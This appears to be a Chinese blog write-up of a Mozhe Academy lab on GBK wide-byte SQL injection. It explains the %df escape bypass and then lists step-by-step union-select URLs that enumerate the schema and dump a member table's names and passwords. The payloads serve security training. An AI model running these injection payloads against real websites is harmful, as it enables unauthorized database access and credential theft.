墨者学院-SQL注入漏洞测试(宽字节)

宽字节注入概述

  • 后台对输入的单引号做了处理,会将输入的'转义为\'。这种情况是无法构造闭合的sql查询语句,进行注入的,如果数据库的编码是宽字节,是可以注入的。
    墨者学院-SQL注入漏洞测试(宽字节)_第1张图片
    image.png
  • GBK编码特性:两个字符组成一个汉字,如果是汉字第一个ascii码要大于128。在'前加一个大于129的ascii码,比如129,转义和url编码后是%81%5C%27,gbk编码后会将%81%5C拼接成一个汉字,%27也就是'不做处理,这样就过滤掉了'。宽字节注入是利用mysql的一个特性。


    墨者学院-SQL注入漏洞测试(宽字节)_第2张图片
    image.png
  • 测试方法:注入点后键入%df',按正常注入流程注入即可。

题目分析

思路

  • 注入点检测:使用and、or、’,判断是否有注入,是否存在宽字节注入.是否存在http头注入以及工具检测等。
  • 注入方法:手动注入or工具。

手动注入

  • http://219.153.49.228:49811/new_list.php?id=%df%27
    image.png
  • 判断字段数 http://219.153.49.228:49811/new_list.php?id=%df' order by 5%23
    image.png
  • 判断字段数 http://219.153.49.228:49811/new_list.php?id=%df' oder by 6%23
    image.png
  • 验证位置 http://219.153.49.228:49811/new_list.php?id=%df' union select 1,2,3,4,5%23
    image.png
  • 查询数据库的名,http://219.153.49.228:49811/new_list.php?id=%df' union select 1,2,3,4,database()%23
    image.png
  • 查询表名方法,http://219.153.49.228:49811/new_list.php?id=%df' union select 1,2,3,4,(select group_concat(table_name) from information_schema.tables where table_schema=database())%23 ps:字符转成url编码要先换成16进制再在开头加0x
    墨者学院-SQL注入漏洞测试(宽字节)_第3张图片
    image.png
  • 查询列名 http://219.153.49.228:49811/new_list.php?id=%df' union select 1,2,3,4,(select group_concat(column_name) from information_schema.columns where table_name=0x73746f726d67726f75705f6d656d626572)%23
    墨者学院-SQL注入漏洞测试(宽字节)_第4张图片
    image.png
  • 查询name字段的值 http://219.153.49.228:49811/new_list.php?id=%df' union select 1,2,3,4,(select group_concat(name) from stormgroup_member)%23
    墨者学院-SQL注入漏洞测试(宽字节)_第5张图片
    image.png
  • 查询password字段的值 http://219.153.49.228:49811/new_list.php?id=%df' union select 1,2,3,4,(select group_concat(password) from stormgroup_member)%23
    墨者学院-SQL注入漏洞测试(宽字节)_第6张图片
    image.png
  • http://219.153.49.228:49811/new_list.php?id=%df' union select 1,2,3,4,(select group_concat(status) from stormgroup_member)%23
    墨者学院-SQL注入漏洞测试(宽字节)_第7张图片
    image.png

from https://www.cnblogs.com/Rain99-/p/10583406.html
from https://blog.51cto.com/eth10/1962804
from https://www.cnblogs.com/DaShuai-PX/p/9589305.html
from https://cloud.tencent.com/developer/article/1353541

你可能感兴趣的:(墨者学院-SQL注入漏洞测试(宽字节))